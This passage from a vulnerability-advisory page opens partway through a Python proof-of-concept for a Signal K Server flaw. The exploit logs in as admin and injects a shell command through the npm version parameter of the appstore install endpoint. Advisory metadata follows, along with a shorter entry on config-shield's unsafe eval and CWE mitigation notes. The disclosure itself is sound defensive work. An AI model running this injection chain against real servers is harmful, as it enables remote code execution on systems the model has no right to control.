token = res.json()[\u0027token\u0027]\n print(\" [+] Login successful. Authenticated as Admin.\")\n\n # 2. RCE Payload (Windows Example)\n # Injecting command into version parameter of npm install\n # Command: echo RCE_SUCCESS \u003e rce_proof.txt\n cmd_payload = \"1.0.0 \u0026 echo RCE_SUCCESS \u003e rce_proof.txt \u0026\"\n \n # We need a valid package name to bypass existence check\n package_name = \"@signalk/freeboard-sk\" \n \n print(f\" [+] Sending RCE payload: {cmd_payload}\")\n headers = {\u0027Authorization\u0027: f\u0027Bearer {token}\u0027}\n try:\n session.post(f\"{TARGET_URL}/skServer/appstore/install/{package_name}/{cmd_payload}\", \n headers=headers, timeout=5)\n except:\n pass # Timeout is expected as the command might hang or take time\n\n print(\" [+] Payload sent. Check for \u0027rce_proof.txt\u0027 in server root.\")\n\nif __name__ == \"__main__\":\n # Run Step 1, then restart server manually, then Run Step 2\n # step1_plant_backdoor()\n step2_execute_rce()\n```\n\n### Impact\nRemote Code Execution (RCE), Account Takeover, Denial of Service.\n**Verified**: RCE is demonstrated by creating a file named `rce_proof.txt` containing the text \"RCE_SUCCESS\" on the server filesystem using the exploit chain.",
"id": "GHSA-w3x5-7c4c-66p9",
"modified": "2026-01-02T15:11:50Z",
"published": "2026-01-02T15:11:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66398"
},
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/commit/5c211eaf33f0ccadbaed6720264780d92afbd7f8"
},
{
"type": "PACKAGE",
"url": "https://github.com/SignalK/signalk-server"
},
{
"type": "WEB",
"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)"
}
GHSA-W8H4-VW8F-RVVJ
Vulnerability from github – Published: 2021-04-13 15:30 – Updated: 2023-09-12 19:22scripts/cli.js in the GoDaddy node-config-shield (aka Config Shield) package before 0.2.2 for Node.js calls eval when processing a set command. NOTE: the vendor reportedly states that this is not a vulnerability. The set command was not intended for use with untrusted data.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "config-shield"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-26276"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-05T22:44:52Z",
"nvd_published_at": "2021-01-27T20:15:00Z",
"severity": "MODERATE"
},
"details": "scripts/cli.js in the GoDaddy node-config-shield (aka Config Shield) package before 0.2.2 for Node.js calls eval when processing a set command. **NOTE:** the vendor reportedly states that this is not a vulnerability. The set command was not intended for use with untrusted data.",
"id": "GHSA-w8h4-vw8f-rvvj",
"modified": "2023-09-12T19:22:22Z",
"published": "2021-04-13T15:30:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26276"
},
{
"type": "WEB",
"url": "https://github.com/godaddy/node-config-shield/commit/cdba5d3a7accd661ffbc52e208153464bd0d9da6"
},
{
"type": "WEB",
"url": "https://advisory.checkmarx.net/advisory/CX-2021-4773"
},
{
"type": "PACKAGE",
"url": "https://github.com/godaddy/node-config-shield"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper Control of Dynamically-Managed Code Resources in config-shield"
}
Mitigation
Strategy: Input Validation
For any externally-influenced input, check the input against an allowlist of acceptable values.
Mitigation
Strategy: Refactoring
Refactor the code so that it does not need to be dynamically managed.
No CAPEC attack patterns related to this CWE.